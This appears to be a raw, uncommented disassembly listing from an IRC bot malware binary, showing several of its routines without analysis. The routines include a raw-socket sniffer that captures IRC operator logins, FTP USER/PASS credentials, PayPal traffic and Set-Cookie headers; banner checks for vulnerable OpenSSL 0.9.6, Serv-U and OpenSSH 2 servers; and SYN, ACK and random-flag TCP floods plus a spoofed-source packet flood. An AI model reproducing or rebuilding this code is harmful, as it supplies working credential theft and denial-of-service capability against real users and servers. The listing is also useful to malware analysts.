jz short loc_41301D
loc_413019: ; CODE XREF: sub_413003+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_41301D: ; CODE XREF: sub_413003+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_413019
push offset aOper ; "OPER "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_413043
loc_41303F: ; CODE XREF: sub_413003+4F�j
; sub_413003+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_413043: ; CODE XREF: sub_413003+3A�j
push offset aNick_1 ; "NICK "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_41303F
push offset aOper_0 ; "oper "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_41303F
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_413003 endp
; =============== S U B R O U T I N E =======================================
sub_413079 proc near ; CODE XREF: sub_4131EC+32E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aFtpSniff ; "FTP sniff"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_413093
loc_41308F: ; CODE XREF: sub_413079+29�j
; sub_413079+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_413093: ; CODE XREF: sub_413079+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_41308F
push offset aNick_1 ; "NICK "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_41308F
push offset a220 ; "220 "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_4130CA
loc_4130C6: ; CODE XREF: sub_413079+60�j
; sub_413079+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4130CA: ; CODE XREF: sub_413079+4B�j
push offset a230 ; "230 "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4130C6
push offset aUser_2 ; "USER "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4130C6
push offset aPass_0 ; "PASS "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_413079 endp
; =============== S U B R O U T I N E =======================================
sub_413100 proc near ; CODE XREF: sub_4131EC+35F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aHttpSniff ; "HTTP sniff"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_41311A
loc_413116: ; CODE XREF: sub_413100+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_41311A: ; CODE XREF: sub_413100+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_413116
push offset aPaypal ; "paypal"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_413140
loc_41313C: ; CODE XREF: sub_413100+4F�j
; sub_413100+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_413140: ; CODE XREF: sub_413100+3A�j
push offset aPaypal_0 ; "PAYPAL"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_41313C
push offset aPaypal_com ; "PAYPAL.COM"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_41313C
push offset aPaypal_com_0 ; "paypal.com"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_41313C
push offset aSetCookie ; "Set-Cookie:"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_413100 endp
; =============== S U B R O U T I N E =======================================
sub_413187 proc near ; CODE XREF: sub_4131EC:loc_4135B1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aVulnSniff ; "VULN sniff"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_4131A1
loc_41319D: ; CODE XREF: sub_413187+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4131A1: ; CODE XREF: sub_413187+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_41319D
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_4131C7
loc_4131C3: ; CODE XREF: sub_413187+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4131C7: ; CODE XREF: sub_413187+3A�j
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4131C3
push offset aOpenssh_2 ; "OpenSSH_2"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_413187 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4131EC proc near ; DATA XREF: sub_401ACD+42A0�o
var_113B8 = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
var_113A4 = dword ptr -113A4h
var_1138C = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
var_3B8 = byte ptr -3B8h
var_3B7 = byte ptr -3B7h
var_2B8 = byte ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 113B8h
call sub_41C500
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+var_B8]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_3B7]
push 3Fh
mov [eax+90h], esi
pop ecx
xor eax, eax
mov [ebp+var_3B8], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_3B8]
mov [ebp+var_20], 2
push eax
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call dword_4CB9E8 ; gethostname
lea eax, [ebp+var_3B8]
push eax
call dword_4CBA58 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_8]
push eax
call sub_41CD20
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx
push 3
push 2
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_413292
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_413292: ; CODE XREF: sub_4131EC+9B�j
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_413308
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push offset unk_437870
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_4132E4
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409869
add esp, 14h
loc_4132E4: ; CODE XREF: sub_4131EC+D6�j
lea eax, [ebp+var_2B8]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_34]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_413308: ; CODE XREF: sub_4131EC+B6�j
push ebx
lea eax, [ebp+var_24]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_C], esi
call dword_4CB980 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_41338E
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push offset unk_437840
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_41336A
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409869
add esp, 14h
loc_41336A: ; CODE XREF: sub_4131EC+15C�j
lea eax, [ebp+var_2B8]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_34]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_41338E: ; CODE XREF: sub_4131EC+13C�j
mov esi, 200h
loc_413393: ; CODE XREF: sub_4131EC+1D6�j
; sub_4131EC+1FB�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_113B8]
push edi
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_113B8]
push ebx
push edi
push eax
push [ebp+var_10]
call dword_4CB9EC ; recv
cmp [ebp+var_113AF], 6
jnz short loc_413393
push [ebp+var_113A4]
mov edi, ds:dword_4271CC
call edi ; htons
push [ebp+var_113A4+2]
movzx eax, ax
mov [ebp+arg_0], eax
call edi ; htons
cmp [ebp+arg_0], 6Eh
movzx edi, ax
jz short loc_413393
cmp [ebp+arg_0], 19h
jz short loc_413393
cmp edi, 6Eh
jz short loc_413393
cmp edi, 19h
jz short loc_413393
push [ebp+var_113AC]
call sub_412EDD
pop ecx
push dword ptr [eax]
call ds:dword_4271D0 ; inet_ntoa
push eax
lea eax, [ebp+var_13B8]
push offset aS_8 ; "%s"
push eax
call sub_41C266
push [ebp+var_113A8]
call sub_412EDD
add esp, 10h
push dword ptr [eax]
call ds:dword_4271D0 ; inet_ntoa
push eax
lea eax, [ebp+var_BB8]
push offset aS_8 ; "%s"
push eax
call sub_41C266
lea eax, [ebp+var_1138C]
mov [ebp+var_4], ebx
push eax
call sub_41B9C0
add esp, 10h
test eax, eax
jle short loc_413491
loc_41345D: ; CODE XREF: sub_4131EC+2A3�j
mov eax, [ebp+var_4]
cmp [ebp+eax+var_1138C], 0Dh
lea eax, [ebp+eax+var_1138C]
jnz short loc_413474
mov byte ptr [eax], 20h
loc_413474: ; CODE XREF: sub_4131EC+283�j
cmp byte ptr [eax], 0Ah
jnz short loc_41347C
mov byte ptr [eax], 20h
loc_41347C: ; CODE XREF: sub_4131EC+28B�j
inc [ebp+var_4]
lea eax, [ebp+var_1138C]
push eax
call sub_41B9C0
cmp [ebp+var_4], eax
pop ecx
jl short loc_41345D
loc_413491: ; CODE XREF: sub_4131EC+26F�j
cmp [ebp+arg_0], 50h
jz loc_413544
cmp edi, 50h
jz loc_413544
lea eax, [ebp+var_1138C]
push eax
call sub_412EEC
test al, al
pop ecx
jz short loc_4134D8
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_43780C
jmp loc_413573
; ---------------------------------------------------------------------------
loc_4134D8: ; CODE XREF: sub_4131EC+2C7�j
cmp edi, 50h
jz short loc_413544
lea eax, [ebp+var_1138C]
push eax
call sub_413003
test al, al
pop ecx
jz short loc_41350E
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_4377D8
jmp short loc_413573
; ---------------------------------------------------------------------------
loc_41350E: ; CODE XREF: sub_4131EC+300�j
cmp edi, 50h
jz short loc_413544
lea eax, [ebp+var_1138C]
push eax
call sub_413079
test al, al
pop ecx
jz short loc_413544
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_4377A4
jmp short loc_413573
; ---------------------------------------------------------------------------
loc_413544: ; CODE XREF: sub_4131EC+2A9�j
; sub_4131EC+2B2�j ...
lea eax, [ebp+var_1138C]
push eax
call sub_413100
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_4135B1
lea eax, [ebp+var_BB8]
push edi
push eax
lea eax, [ebp+var_13B8]
push [ebp+arg_0]
push eax
push offset unk_43776C
loc_413573: ; CODE XREF: sub_4131EC+2E7�j
; sub_4131EC+320�j ...
lea eax, [ebp+var_2B8]
push esi
push eax
call sub_41C360
add esp, 20h
cmp [ebp+var_2C], ebx
jnz loc_413393
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409869
add esp, 14h
jmp loc_413393
; ---------------------------------------------------------------------------
loc_4135B1: ; CODE XREF: sub_4131EC+36E�j
call sub_413187
test al, al
pop ecx
jz loc_413393
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_437734
jmp short loc_413573
sub_4131EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4135DF proc near ; DATA XREF: sub_401ACD+6464�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4139CB
add esp, 14h
push eax
lea eax, [ebp+var_494]
push offset unk_43789C
push eax
call sub_41C266
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_413672
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_409869
add esp, 14h
loc_413672: ; CODE XREF: sub_4135DF+71�j
lea eax, [ebp+var_494]
push eax
call sub_415D38
push [ebp+var_290]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_4135DF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413694 proc near ; CODE XREF: sub_4139CB+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4CB944 ; WSAStartup
test eax, eax
jz short loc_4136D4
xor eax, eax
jmp loc_4139C7
; ---------------------------------------------------------------------------
loc_4136D4: ; CODE XREF: sub_413694+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4CBA78 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4139BF
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4139B5
push [ebp+arg_C]
mov [ebp+var_58], 2
call dword_4CB9D4 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call dword_4CB9D4 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call dword_4CB9D4 ; htons
mov [ebp+var_12], ax
call sub_41C2C2
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4CB9D4 ; htons
push 12345678h
mov [ebp+var_14], ax
call dword_4CB9D0 ; htonl
push offset aDdos_syn ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4137A4
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_4137F8
; ---------------------------------------------------------------------------
loc_4137A4: ; CODE XREF: sub_413694+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+arg_8]
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4137C0
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_4137F8
; ---------------------------------------------------------------------------
loc_4137C0: ; CODE XREF: sub_413694+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+arg_8]
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4137F8
call sub_41C2C2
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_41C2C2
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_4137F8: ; CODE XREF: sub_413694+10E�j
; sub_413694+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call dword_4CB9D4 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call ds:dword_42713C ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_427138 ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_41DB20
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_413846: ; CODE XREF: sub_413694+2E2�j
; sub_413694+2F0�j
mov [ebp+var_4], bx
call sub_41C2C2
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4CB9D4 ; htons
mov [ebp+var_14], ax
call sub_41C2C2
mov edi, eax
shl edi, 10h
call sub_41C2C2
or edi, eax
push edi
call dword_4CB9D4 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4CB9D0 ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4CB9D4 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41CD20
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_41CD20
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AA5F
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41CD20
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41CD20
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_41BF70
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AA5F
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41CD20
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_413989
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_427138 ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4139B2
jl loc_413846
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4139B2
jmp loc_413846
; ---------------------------------------------------------------------------
loc_413989: ; CODE XREF: sub_413694+2CB�j
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset dword_4378C4
push eax
call sub_41C266
lea eax, [ebp+var_F4]
push eax
call sub_415D38
add esp, 10h
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139B2: ; CODE XREF: sub_413694+2E0�j
; sub_413694+2EE�j
mov ebx, [ebp+arg_8]
loc_4139B5: ; CODE XREF: sub_413694+78�j
; sub_413694+31C�j
push [ebp+var_20]
call dword_4CBA6C ; closesocket
pop esi
loc_4139BF: ; CODE XREF: sub_413694+5B�j
call dword_4CB92C ; WSACleanup
mov eax, ebx
loc_4139C7: ; CODE XREF: sub_413694+3B�j
pop edi
pop ebx
leave
retn
sub_413694 endp
; =============== S U B R O U T I N E =======================================
sub_4139CB proc near ; CODE XREF: sub_4135DF+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40A8F0
push [esp+10h+arg_4]
mov esi, eax
call sub_41C159
push [esp+14h+arg_C]
mov ebx, eax
call sub_41C159
mov edi, eax
call sub_41C2C2
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_413694
add esp, 20h
test eax, eax
jnz short loc_413A1A
push 1
pop eax
loc_413A1A: ; CODE XREF: sub_4139CB+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4139CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413A29 proc near ; DATA XREF: sub_401ACD+6643�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_413AC4
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_4379C4
push eax
call sub_41C266
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_413AA7
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409869
add esp, 14h
loc_413AA7: ; CODE XREF: sub_413A29+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413AC4: ; CODE XREF: sub_413A29+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_413B3B
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_437994
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_413B1E
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409869
add esp, 14h
loc_413B1E: ; CODE XREF: sub_413A29+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413B3B: ; CODE XREF: sub_413A29+B3�j
lea eax, [ebp+var_1B8]
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_413BA2
lea eax, [ebp+var_3BC]
push offset unk_437974
push eax
call sub_41C266
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_413B85
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409869
add esp, 14h
loc_413B85: ; CODE XREF: sub_413A29+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413BA2: ; CODE XREF: sub_413A29+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call dword_4CB9D4 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_4CBA14 ; inet_addr
mov esi, ds:dword_4270B0
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_413BE0: ; CODE XREF: sub_413A29+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_413D8B
push 41Ch
mov byte_4CE740, 45h
call dword_4CB9D4 ; htons
cmp [ebp+var_2C], edi
mov word_4CE742, ax
mov word_4CE744, bx
mov word_4CE746, di
mov byte_4CE748, 80h
mov byte_4CE749, bl
mov word_4CE74A, di
jz short loc_413C66
call sub_41C2C2
mov ebx, eax
shl ebx, 8
call sub_41C2C2
add ebx, eax
shl ebx, 8
call sub_41C2C2
add ebx, eax
shl ebx, 8
call sub_41C2C2
add ebx, eax
push 1
mov dword_4CE74C, ebx
pop ebx
jmp short loc_413C7E
; ---------------------------------------------------------------------------
loc_413C66: ; CODE XREF: sub_413A29+20B�j
push [ebp+var_1BC]
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
mov dword_4CE74C, eax
loc_413C7E: ; CODE XREF: sub_413A29+23B�j
mov eax, [ebp+var_18]
mov dword_4CE750, eax
call sub_41C2C2
cdq
mov ecx, 100h
idiv ecx
mov byte_4CE754, dl
call sub_41C2C2
cdq
mov ecx, 100h
idiv ecx
mov byte_4CE755, dl
call sub_41C2C2
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov word_4CE756, di
mov word_4CE75A, bx
inc edx
mov word_4CE758, dx
call sub_41C2C2
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_4CE75C
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_4CE740
push [ebp+var_4]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_413D16
inc [ebp+arg_0]
jmp loc_413BE0
; ---------------------------------------------------------------------------
loc_413D16: ; CODE XREF: sub_413A29+2E3�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset unk_43792C
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41C360
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_413D6E
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409869
add esp, 14h
loc_413D6E: ; CODE XREF: sub_413A29+323�j
lea eax, [ebp+var_3BC]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
